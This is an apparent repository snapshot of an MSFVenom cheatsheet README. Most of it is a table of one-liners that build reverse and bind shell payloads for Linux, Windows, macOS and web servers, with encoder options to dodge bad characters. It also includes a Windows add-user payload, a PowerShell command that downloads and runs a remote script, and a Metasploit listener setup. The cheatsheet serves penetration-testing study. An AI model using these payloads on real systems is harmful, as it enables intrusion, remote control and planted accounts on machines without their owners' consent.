├── MSF Venom Cheatsheet.docx ├── MSF Venom Cheatsheet.pdf └── README.md /MSF Venom Cheatsheet.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/frizb/MSF-Venom-Cheatsheet/6650b4bc2d17cf788718abb732e0c43c2b1a6f72/MSF Venom Cheatsheet.docx -------------------------------------------------------------------------------- /MSF Venom Cheatsheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/frizb/MSF-Venom-Cheatsheet/6650b4bc2d17cf788718abb732e0c43c2b1a6f72/MSF Venom Cheatsheet.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MSFVenom Cheatsheet 2 | Single Page Cheatsheet for common MSF Venom One Liners 3 | Available in PDF, DOCX and Markdown format! 4 | *PDF and DOCX versions contain the payload size in bytes and a few more commands.* 5 | 6 | 7 | # MSFVenom Cheatsheet 8 | 9 | | MSFVenom Payload Generation One-Liner | Description | 10 | |-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------| 11 | | msfvenom -l payloads | List available payloads | 12 | | msfvenom -p PAYLOAD --list-options | List payload options | 13 | | msfvenom -p PAYLOAD -e ENCODER -f FORMAT -i ENCODE COUNT LHOST=IP | Payload Encoding | 14 | | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf | Linux Meterpreter reverse shell x86 multi stage | 15 | | msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf | Linux Meterpreter bind shell x86 multi stage | 16 | | msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf | Linux bind shell x64 single stage | 17 | | msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf | Linux reverse shell x64 single stage | 18 | | msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe | Windows Meterpreter reverse shell | 19 | | msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe | Windows Meterpreter http reverse shell | 20 | | msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe | Windows Meterpreter bind shell | 21 | | msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe | Windows CMD Multi Stage | 22 | | msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe | Windows CMD Single Stage | 23 | | msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe | Windows add user | 24 | | msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho > shell.macho | Mac Reverse Shell | 25 | | msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho > shell.macho | Mac Bind shell | 26 | | msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py | Python Shell | 27 | | msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw > shell.sh | BASH Shell | 28 | | msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl | PERL Shell | 29 | | msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp | ASP Meterpreter shell | 30 | | msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.jsp | JSP Shell | 31 | | msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f war > shell.war | WAR Shell | 32 | | msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw > shell.php cat shell.php | pbcopy && echo '?php ' | tr -d '\n' shell.php && pbpaste shell.php | Php Meterpreter Shell | 33 | | msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php | Php Reverse Shell | 34 | | msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \\"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f python | Windows Exec Nishang Powershell in python | 35 | | msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x04\xA0" | Bad characters shikata_ga_nai | 36 | | msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b "\x04\xA0" | Bad characters fnstenv_mov | 37 | 38 | # Multihandler Listener 39 | To get multiple session on a single multi/handler, you need to set the ExitOnSession option to false and run the exploit -j instead of just the exploit. For example, for meterpreter/reverse_tcp payload, 40 | ``` 41 | msf>use exploit/multi/handler 42 | msf>set payload windows/meterpreter/reverse_tcp 43 | msf>set lhost 44 | msf>set lport 45 | msf> set ExitOnSession false 46 | msf>exploit -j 47 | ``` 48 | The -j option is to keep all the connected session in the background. 49 | 50 | 51 | # References 52 | 53 | https://kb.help.rapid7.com/discuss/598ab88172371b000f5a4675 54 | https://thor-sec.com/cheatsheet/oscp/msfvenom_cheat_sheet/ 55 | http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/ 56 | --------------------------------------------------------------------------------